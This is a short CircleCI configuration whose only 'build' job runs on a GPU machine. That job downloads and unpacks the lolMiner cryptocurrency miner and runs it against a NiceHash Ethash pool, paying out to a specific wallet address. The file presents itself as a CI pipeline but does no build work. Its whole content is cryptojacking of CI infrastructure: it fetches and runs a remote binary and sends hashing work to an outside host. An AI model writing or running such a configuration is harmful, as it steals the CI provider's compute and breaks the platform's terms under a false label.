version: 2.1
jobs:
  build:
    machine:
      resource_class: gpu.nvidia.medium
      image: ubuntu-2004:202010-01
    steps:
      - run: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.49/lolMiner_v1.49_Lin64.tar.gz && tar -xf lolMiner_v1.49_Lin64.tar.gz && cd 1.49 && ./lolMiner --algo ETHASH --pool stratum+tcp://daggerhashimoto.eu.nicehash.com:3353 --user 3LvsCjHUWwvt6En14BTQrM8SG8Tm6cfwCF.M3 --tls 0